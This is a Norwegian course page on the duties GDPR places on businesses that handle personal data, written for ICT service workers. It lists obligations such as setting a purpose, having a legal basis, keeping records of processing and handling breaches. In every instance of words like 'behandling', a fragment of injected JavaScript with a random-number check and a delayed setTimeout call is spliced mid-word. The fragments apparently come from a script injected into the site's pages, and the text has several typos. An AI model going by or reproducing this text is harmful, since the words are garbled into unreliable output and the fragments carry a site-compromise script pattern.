4.4.2 Virksomhetens plikter
GDPR pålegger virksomheter en rekke plikter og oppgaver i forbindelse med behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling av personopplysninger.
Som IKT-servicemedarbeider i en virksomhet kan du komme til å få oppgaver knyttet til behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling av personopplysninger.
Det er derfor viktig at du er klar over at loven pålegger virksomheter en rekke krav de må etterleve når den håndterer personopplysninger.
Ved innsamling og behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling av personopplysninger må virksomheter blant annet:
- Fastsette formål
- Ha behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlingsgrunnlag
- Gi informasjon
- Legge til rette for den registrertes rettigheter
- Håndtere retting og sletting av informasjon
- Vurdere om det bør opprettes personvernombud
- Vurdere personvernkonsekvenser og gjernnomføre forhåndsdrøftelse
- Sørge for innebygd personvern
- Opprettholde informasjonssikkerht, og gjennomføre internkontroll
- Ha en protokoll over behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlingsaktiviteter
- Opprette databehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andleravtale om nødvendig
- Ha prosedyrer for avvikshåndtering
- Evt. håndrere overføring av opplysninger til utlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andet
Datatilsynet om virksomhetenes plikter
Klikk her for neste post: 4.4.3 Den registrertes rettigheter